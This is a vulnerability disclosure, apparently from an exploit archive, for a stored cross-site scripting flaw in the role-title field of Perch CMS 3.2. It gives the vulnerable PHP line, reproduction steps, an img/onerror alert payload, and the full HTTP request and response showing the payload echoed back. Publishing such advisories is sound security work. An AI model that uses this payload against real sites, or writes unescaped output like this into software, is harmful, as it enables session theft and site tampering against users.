Share
## https://sploitus.com/exploit?id=PACKETSTORM:173914
# Exploit Title:  
# Date: 07/2023  
# Exploit Author: Andrey Stoykov  
# Version: 3.2  
# Tested on: Windows Server 2022  
# Blog: http://msecureltd.blogspot.com  
  
  
XSS #1:  
  
File: roles.edit.post.php  
  
Line #57:  
  
[...]  
<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">  
<?php echo $Form->label('roleTitle', 'Title'); ?>  
<div class="form-entry">  
<?php echo $Form->text('roleTitle', $Form->get($details,  
'roleTitle')); ?>  
</div>  
</div>  
[...]  
  
  
  
Steps to Reproduce:  
  
1. Login to application  
2. Go to Roles  
3. Select Title  
4. Enter payload TEST"><img src=x onerror=alert(1)>  
  
  
// HTTP POST request  
  
POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1  
Host: 192.168.1.11  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/114.0  
[...]  
  
roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0  
  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4  
[...]  
  
[...]  
<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x  
onerror=alert(1)></a>  
[...]